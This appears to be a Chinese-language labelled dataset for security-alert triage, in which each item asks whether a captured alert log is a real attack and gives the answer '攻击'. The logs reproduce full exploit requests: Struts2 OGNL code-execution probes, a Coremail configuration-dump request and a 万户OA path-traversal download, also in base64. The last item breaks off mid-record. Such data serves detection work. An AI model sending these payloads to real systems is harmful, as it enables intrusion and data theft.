你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688144", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "代码执行", "_origin": {"write_date": 1732688144, "vuln_harm": "通常情况下,远程代码执行漏洞包括:\r\n\r\n(1)URL提交,主要是GET、POST请求;\r\n\r\n(2)构造特定的HTTP请求;\r\n\r\n(3)利用一些框架底层的安全漏洞,执行任意代码;\r\n\r\n远程代码执行漏洞可带来如下危害:\r\n\r\n(1)攻击者可通过此漏洞创建恶意脚本文件,对服务器的正常运行造成安全威胁;\r\n\r\n(2)黑客可在服务器上执行任意脚本命令,写入后门,从而入侵服务器,获取服务器的管理员权限,危害巨大。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.68.194", "site_app": "", "hit_end": 23, "uri": "/?%28%27%5C43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27%5C43context[%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27]%5C75false%27%29%28b%29%29&%28%27%5C43c%27%29%28%28%27%5C43_memberAccess.excludeProperties%[email protected]@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27%5C43req%[email protected]@getRequest%28%29%27%29%28d%29%29&%28i2%29%28%28%27%5C43xman%[email protected]@getResponse%28%29%27%29%28d%29%29&%28i97%29%28%28%27%5C43xman.getWriter%28%29.println%2842012*42806%29%27%29%28d%29%29&%28i99%29%28%28%27%5C43xman.getWriter%28%29.close%28%29%27%29%28d%29%29", "dport": 30001, "vuln_name": "Java框架通用代码执行攻击", "rsp_status": 0, "code_language": "Java", "solution": "解决远程代码执行问题的关键是对所有可能来自用户输入的数据进行严格的检查、对服务器的安全配置使用最小权限原则。 通常使用的方案有:\r\n\r\n(1)对输入的数据中特殊字符进行转义处理,或编码转换\r\n\r\n(2)对当前web中间件权限降权处理\r\n\r\n(3)若应用程序使用第三方开源框架,将框架版本升级至最新版;", "hit_start": 3, "detail_info": "远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在JavaWeb中代码执行以Struts2、Weblogic、Spring最为知名,恶意攻击者只需要构造出OGNL、SPEL表达式或者反序列化代码就可以执行任意代码命令。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在JavaWeb中代码执行以Struts2、Weblogic、Spring最为知名,恶意攻击者只需要构造出OGNL、SPEL表达式或者反序列化代码就可以执行任意代码命令。", "public_date": "2018-07-16 16:38:08", "sport": 12125}, "detail_info": "远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在JavaWeb中代码执行以Struts2、Weblogic、Spring最为知名,恶意攻击者只需要构造出OGNL、SPEL表达式或者反序列化代码就可以执行任意代码命令。", "file_md5": "", "rule_key": "webids", "api": "218.76.15.56:30001/", "first_access_time": "2024-11-27 14:15:44", "hazard_level": "8", "hazard_rating": "危急", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Java框架通用代码执行攻击", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "9a43a3599687ae8b5a56edcc50d47afe", "xff": "", "vuln_desc": "远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在JavaWeb中代码执行以Struts2、Weblogic、Spring最为知名,恶意攻击者只需要构造出OGNL、SPEL表达式或者反序列化代码就可以执行任意代码命令。", "attack_chain": "0x02020000", "vuln_harm": "通常情况下,远程代码执行漏洞包括:\r\n\r\n(1)URL提交,主要是GET、POST请求;\r\n\r\n(2)构造特定的HTTP请求;\r\n\r\n(3)利用一些框架底层的安全漏洞,执行任意代码;\r\n\r\n远程代码执行漏洞可带来如下危害:\r\n\r\n(1)攻击者可通过此漏洞创建恶意脚本文件,对服务器的正常运行造成安全威胁;\r\n\r\n(2)黑客可在服务器上执行任意脚本命令,写入后门,从而入侵服务器,获取服务器的管理员权限,危害巨大。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688124", "code_language": "Java", "public_date": "2018-07-16 16:38:08", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "23", "h_proto_version": "HTTP/1.1", "uri": "/?%28%27%5C43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27%5C43context[%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27]%5C75false%27%29%28b%29%29&%28%27%5C43c%27%29%28%28%27%5C43_memberAccess.excludeProperties%[email protected]@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27%5C43req%[email protected]@getRequest%28%29%27%29%28d%29%29&%28i2%29%28%28%27%5C43xman%[email protected]@getResponse%28%29%27%29%28d%29%29&%28i97%29%28%28%27%5C43xman.getWriter%28%29.println%2842012*42806%29%27%29%28d%29%29&%28i99%29%28%28%27%5C43xman.getWriter%28%29.close%28%29%27%29%28d%29%29", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020537", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "Java框架通用代码执行攻击", "attack_type": "代码执行", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "解决远程代码执行问题的关键是对所有可能来自用户输入的数据进行严格的检查、对服务器的安全配置使用最小权限原则。 通常使用的方案有:\r\n\r\n(1)对输入的数据中特殊字符进行转义处理,或编码转换\r\n\r\n(2)对当前web中间件权限降权处理\r\n\r\n(3)若应用程序使用第三方开源框架,将框架版本升级至最新版;", "hit_start": "3", "skyeye_id": "", "payload": {"req_header": "R0VUIC8/JTI4JTI3JTVDNDNfbWVtYmVyQWNjZXNzLmFsbG93U3RhdGljTWV0aG9kQWNjZXNzJTI3JTI5JTI4YSUyOT10cnVlJiUyOGIlMjklMjglMjglMjclNUM0M2NvbnRleHRbJTVDJTI3eHdvcmsuTWV0aG9kQWNjZXNzb3IuZGVueU1ldGhvZEV4ZWN1dGlvbiU1QyUyN10lNUM3NWZhbHNlJTI3JTI5JTI4YiUyOSUyOSYlMjglMjclNUM0M2MlMjclMjklMjglMjglMjclNUM0M19tZW1iZXJBY2Nlc3MuZXhjbHVkZVByb3BlcnRpZXMlNUM3NUBqYXZhLnV0aWwuQ29sbGVjdGlvbnNARU1QVFlfU0VUJTI3JTI5JTI4YyUyOSUyOSYlMjhnJTI5JTI4JTI4JTI3JTVDNDNyZXElNUM3NUBvcmcuYXBhY2hlLnN0cnV0czIuU2VydmxldEFjdGlvbkNvbnRleHRAZ2V0UmVxdWVzdCUyOCUyOSUyNyUyOSUyOGQlMjklMjkmJTI4aTIlMjklMjglMjglMjclNUM0M3htYW4lNUM3NUBvcmcuYXBhY2hlLnN0cnV0czIuU2VydmxldEFjdGlvbkNvbnRleHRAZ2V0UmVzcG9uc2UlMjglMjklMjclMjklMjhkJTI5JTI5JiUyOGk5NyUyOSUyOCUyOCUyNyU1QzQzeG1hbi5nZXRXcml0ZXIlMjglMjkucHJpbnRsbiUyODQyMDEyKjQyODA2JTI5JTI3JTI5JTI4ZCUyOSUyOSYlMjhpOTklMjklMjglMjglMjclNUM0M3htYW4uZ2V0V3JpdGVyJTI4JTI5LmNsb3NlJTI4JTI5JTI3JTI5JTI4ZCUyOSUyOSBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjU2OjMwMDAxDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBydjo3OC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94Lzc4LjANCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQpEbnQ6IDENClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_8e788e273d03561dceb9120e3da7fc72", "access_time": "2024-11-27 14:15:44", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16030000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "dimension": "3", "url_path": "/", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /?%28%27%5C43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27%5C43context[%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27]%5C75false%27%29%28b%29%29&%28%27%5C43c%27%29%28%28%27%5C43_memberAccess.excludeProperties%[email protected]@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27%5C43req%[email protected]@getRequest%28%29%27%29%28d%29%29&%28i2%29%28%28%27%5C43xman%[email protected]@getResponse%28%29%27%29%28d%29%29&%28i97%29%28%28%27%5C43xman.getWriter%28%29.println%2842012*42806%29%27%29%28d%29%29&%28i99%29%28%28%27%5C43xman.getWriter%28%29.close%28%29%27%29%28d%29%29 HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268567863-Java框架通用代码执行攻击", "rule_labels": "{\"0x110700\": {\"parent_name\": \"\", \"type\": \"\", \"name\": \"二次访问分析\", \"parent_id\": \"0\", \"proto\": \"TCP\"}, \"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12125", "h_url": "/?%28%27%5C43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27%5C43context[%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27]%5C75false%27%29%28b%29%29&%28%27%5C43c%27%29%28%28%27%5C43_memberAccess.excludeProperties%[email protected]@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27%5C43req%[email protected]@getRequest%28%29%27%29%28d%29%29&%28i2%29%28%28%27%5C43xman%[email protected]@getResponse%28%29%27%29%28d%29%29&%28i97%29%28%28%27%5C43xman.getWriter%28%29.println%2842012*42806%29%27%29%28d%29%29&%28i99%29%28%28%27%5C43xman.getWriter%28%29.close%28%29%27%29%28d%29%29"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688144", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "代码执行", "_origin": {"write_date": 1732688144, "vuln_harm": "成功利用此漏洞,可导致服务器被完全控制,成为肉鸡,危害极大。", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.23.68.194", "site_app": "", "hit_end": 0, "uri": "/?%28%27%5C43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27%5C43context[%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27]%5C75false%27%29%28b%29%29&%28%27%5C43c%27%29%28%28%27%5C43_memberAccess.excludeProperties%[email protected]@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27%5C43req%[email protected]@getRequest%28%29%27%29%28d%29%29&%28i2%29%28%28%27%5C43xman%[email protected]@getResponse%28%29%27%29%28d%29%29&%28i97%29%28%28%27%5C43xman.getWriter%28%29.println%2842012*42806%29%27%29%28d%29%29&%28i99%29%28%28%27%5C43xman.getWriter%28%29.close%28%29%27%29%28d%29%29", "dport": 30001, "vuln_name": "Struts代码执行漏洞(机器学习)", "rsp_status": 0, "code_language": "", "solution": "升级系统版本,及时更新。", "hit_start": 0, "detail_info": "Apache Struts可能因为配置问题导致远程代码执行。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "Apache Struts可能因为配置问题导致远程代码执行。", "public_date": "2020-11-25 19:42:36", "sport": 12125}, "detail_info": "Apache Struts可能因为配置问题导致远程代码执行。", "file_md5": "", "rule_key": "webids", "api": "218.76.15.56:30001/", "first_access_time": "2024-11-27 14:15:44", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Struts代码执行漏洞(机器学习)", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "25ec28d6549bca7c4356291e491ae013", "xff": "", "vuln_desc": "Apache Struts可能因为配置问题导致远程代码执行。", "attack_chain": "0x02020000", "vuln_harm": "成功利用此漏洞,可导致服务器被完全控制,成为肉鸡,危害极大。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688124", "code_language": "", "public_date": "2020-11-25 19:42:36", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "0", "h_proto_version": "HTTP/1.1", "uri": "/?%28%27%5C43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27%5C43context[%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27]%5C75false%27%29%28b%29%29&%28%27%5C43c%27%29%28%28%27%5C43_memberAccess.excludeProperties%[email protected]@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27%5C43req%[email protected]@getRequest%28%29%27%29%28d%29%29&%28i2%29%28%28%27%5C43xman%[email protected]@getResponse%28%29%27%29%28d%29%29&%28i97%29%28%28%27%5C43xman.getWriter%28%29.println%2842012*42806%29%27%29%28d%29%29&%28i99%29%28%28%27%5C43xman.getWriter%28%29.close%28%29%27%29%28d%29%29", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020b68", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "Struts代码执行漏洞(机器学习)", "attack_type": "代码执行", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "升级系统版本,及时更新。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "R0VUIC8/JTI4JTI3JTVDNDNfbWVtYmVyQWNjZXNzLmFsbG93U3RhdGljTWV0aG9kQWNjZXNzJTI3JTI5JTI4YSUyOT10cnVlJiUyOGIlMjklMjglMjglMjclNUM0M2NvbnRleHRbJTVDJTI3eHdvcmsuTWV0aG9kQWNjZXNzb3IuZGVueU1ldGhvZEV4ZWN1dGlvbiU1QyUyN10lNUM3NWZhbHNlJTI3JTI5JTI4YiUyOSUyOSYlMjglMjclNUM0M2MlMjclMjklMjglMjglMjclNUM0M19tZW1iZXJBY2Nlc3MuZXhjbHVkZVByb3BlcnRpZXMlNUM3NUBqYXZhLnV0aWwuQ29sbGVjdGlvbnNARU1QVFlfU0VUJTI3JTI5JTI4YyUyOSUyOSYlMjhnJTI5JTI4JTI4JTI3JTVDNDNyZXElNUM3NUBvcmcuYXBhY2hlLnN0cnV0czIuU2VydmxldEFjdGlvbkNvbnRleHRAZ2V0UmVxdWVzdCUyOCUyOSUyNyUyOSUyOGQlMjklMjkmJTI4aTIlMjklMjglMjglMjclNUM0M3htYW4lNUM3NUBvcmcuYXBhY2hlLnN0cnV0czIuU2VydmxldEFjdGlvbkNvbnRleHRAZ2V0UmVzcG9uc2UlMjglMjklMjclMjklMjhkJTI5JTI5JiUyOGk5NyUyOSUyOCUyOCUyNyU1QzQzeG1hbi5nZXRXcml0ZXIlMjglMjkucHJpbnRsbiUyODQyMDEyKjQyODA2JTI5JTI3JTI5JTI4ZCUyOSUyOSYlMjhpOTklMjklMjglMjglMjclNUM0M3htYW4uZ2V0V3JpdGVyJTI4JTI5LmNsb3NlJTI4JTI5JTI3JTI5JTI4ZCUyOSUyOSBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjU2OjMwMDAxDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBydjo3OC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94Lzc4LjANCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQpEbnQ6IDENClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_ab85575f1b1429154b67480427c33027", "access_time": "2024-11-27 14:15:44", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16030000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "dimension": "3", "url_path": "/", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /?%28%27%5C43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27%5C43context[%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27]%5C75false%27%29%28b%29%29&%28%27%5C43c%27%29%28%28%27%5C43_memberAccess.excludeProperties%[email protected]@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27%5C43req%[email protected]@getRequest%28%29%27%29%28d%29%29&%28i2%29%28%28%27%5C43xman%[email protected]@getResponse%28%29%27%29%28d%29%29&%28i97%29%28%28%27%5C43xman.getWriter%28%29.println%2842012*42806%29%27%29%28d%29%29&%28i99%29%28%28%27%5C43xman.getWriter%28%29.close%28%29%27%29%28d%29%29 HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569448-Struts代码执行漏洞(机器学习)", "rule_labels": "{\"0x110700\": {\"parent_name\": \"\", \"type\": \"\", \"name\": \"二次访问分析\", \"parent_id\": \"0\", \"proto\": \"TCP\"}}", "sport": "12125", "h_url": "/?%28%27%5C43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27%5C43context[%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27]%5C75false%27%29%28b%29%29&%28%27%5C43c%27%29%28%28%27%5C43_memberAccess.excludeProperties%[email protected]@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27%5C43req%[email protected]@getRequest%28%29%27%29%28d%29%29&%28i2%29%28%28%27%5C43xman%[email protected]@getResponse%28%29%27%29%28d%29%29&%28i97%29%28%28%27%5C43xman.getWriter%28%29.println%2842012*42806%29%27%29%28d%29%29&%28i99%29%28%28%27%5C43xman.getWriter%28%29.close%28%29%27%29%28d%29%29"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688142", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "信息泄露", "_origin": {"write_date": 1732688142, "vuln_harm": "攻击者能读取配置文件信息,进而完成后续漏洞利用过程。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.68.194", "site_app": "", "hit_end": 45, "uri": "/mailsms/s?func=ADMIN:appState&dumpConfig=/", "dport": 30001, "vuln_name": "Coremail接口配置文件读取漏洞攻击尝试", "rsp_status": 0, "code_language": "", "solution": "官网升级到最新版本。\r\n限制外网对mailsms/s?func=ADMIN:appState&dumpConfig=/ 路径的访问。", "hit_start": 25, "detail_info": "Coremail产品诞生于1999年,经过二十多年发展,如今从亿万级别的运营系统,到几万人的大型企业,都有了Coremail的客户。\r\n\r\n截止2019年,Coremail邮件系统产品在国内已拥有10亿终端用户 ,是目前国内拥有邮箱使用用户最多的邮件系统。Coremail今天不但为网易(126、163、yeah)、移动,联通等知名运营商提供电子邮件整体技术解决方案及企业邮局运营服务,还为石油、钢铁、电力、政府、金融、教育、尖端制造企业等用户提供邮件系统软件和反垃圾服务。攻击者能读取配置文件信息,进而完成后续漏洞利用过程。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "Coremail产品诞生于1999年,经过二十多年发展,如今从亿万级别的运营系统,到几万人的大型企业,都有了Coremail的客户。\r\n\r\n截止2019年,Coremail邮件系统产品在国内已拥有10亿终端用户 ,是目前国内拥有邮箱使用用户最多的邮件系统。Coremail今天不但为网易(126、163、yeah)、移动,联通等知名运营商提供电子邮件整体技术解决方案及企业邮局运营服务,还为石油、钢铁、电力、政府、金融、教育、尖端制造企业等用户提供邮件系统软件和反垃圾服务。攻击者能读取配置文件信息,进而完成后续漏洞利用过程。", "public_date": "2019-06-14 14:16:20", "sport": 12129}, "detail_info": "Coremail产品诞生于1999年,经过二十多年发展,如今从亿万级别的运营系统,到几万人的大型企业,都有了Coremail的客户。\r\n\r\n截止2019年,Coremail邮件系统产品在国内已拥有10亿终端用户 ,是目前国内拥有邮箱使用用户最多的邮件系统。Coremail今天不但为网易(126、163、yeah)、移动,联通等知名运营商提供电子邮件整体技术解决方案及企业邮局运营服务,还为石油、钢铁、电力、政府、金融、教育、尖端制造企业等用户提供邮件系统软件和反垃圾服务。攻击者能读取配置文件信息,进而完成后续漏洞利用过程。", "file_md5": "", "rule_key": "webids", "api": "218.76.15.56:30001/mailsms/s", "first_access_time": "2024-11-27 14:15:42", "hazard_level": "8", "hazard_rating": "危急", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Coremail接口配置文件读取漏洞攻击尝试", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "56d043d1fd0db7c6495a087c9b4f43f0", "xff": "", "vuln_desc": "Coremail产品诞生于1999年,经过二十多年发展,如今从亿万级别的运营系统,到几万人的大型企业,都有了Coremail的客户。\r\n\r\n截止2019年,Coremail邮件系统产品在国内已拥有10亿终端用户 ,是目前国内拥有邮箱使用用户最多的邮件系统。Coremail今天不但为网易(126、163、yeah)、移动,联通等知名运营商提供电子邮件整体技术解决方案及企业邮局运营服务,还为石油、钢铁、电力、政府、金融、教育、尖端制造企业等用户提供邮件系统软件和反垃圾服务。攻击者能读取配置文件信息,进而完成后续漏洞利用过程。", "attack_chain": "0x02010000", "vuln_harm": "攻击者能读取配置文件信息,进而完成后续漏洞利用过程。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688122", "code_language": "", "public_date": "2019-06-14 14:16:20", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "45", "h_proto_version": "HTTP/1.1", "uri": "/mailsms/s?func=ADMIN:appState&dumpConfig=/", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x100206b4", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "Coremail接口配置文件读取漏洞攻击尝试", "attack_type": "敏感信息/重要文件泄漏", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "官网升级到最新版本。\r\n限制外网对mailsms/s?func=ADMIN:appState&dumpConfig=/ 路径的访问。", "hit_start": "25", "skyeye_id": "", "payload": {"req_header": "R0VUIC9tYWlsc21zL3M/ZnVuYz1BRE1JTjphcHBTdGF0ZSZkdW1wQ29uZmlnPS8gSFRUUC8xLjENCkhvc3Q6IDIxOC43Ni4xNS41NjozMDAwMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgcnY6NzguMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC83OC4wDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOQ0KRG50OiAxDQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_11f499d8897a8ebca84e57b9f66d6241", "access_time": "2024-11-27 14:15:42", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16160000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "dimension": "3", "url_path": "/mailsms/s", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "dumpconfig": "/", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /mailsms/s?func=ADMIN:appState&dumpConfig=/ HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "func": "ADMIN:appState", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268568244-Coremail接口配置文件读取漏洞攻击尝试", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12129", "h_url": "/mailsms/s?func=ADMIN:appState&dumpConfig=/"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688142", "vlan_id": "", "vuln_type": "万户OA 任意文件下载漏洞", "rule_version_str": "3.0.1122.14572", "attack_type": "文件下载", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.23.68.194", "sip_group": "", "repeat_count": "1", "type": "文件下载", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732688142, "vuln_harm": "攻击者可以通过此漏洞下载系统敏感信息文件", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.68.194", "site_app": "", "hit_end": 62, "uri": "/defaultroot/DownloadServlet?modeType=2&path=html&FileName=..\\..\\login.jsp&name=123&fiewviewdownload=2&cd=inline&downloadAll=2", "dport": 30001, "vuln_name": "万户OA 任意文件下载漏洞", "rsp_status": 0, "code_language": "", "solution": "关注官方漏洞补丁,及时更新系统至漏洞修复版本。", "hit_start": 42, "detail_info": "万户OA存在任意文件下载漏洞,泄露的信息包括用户的账号密码信息。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "万户OA存在任意文件下载漏洞,泄露的信息包括用户的账号密码信息。", "public_date": "2022-07-06 17:14:05", "sport": 11781}, "solution": "关注官方漏洞补丁,及时更新系统至漏洞修复版本。", "hit_start": "42", "skyeye_id": "", "payload": {"req_header": 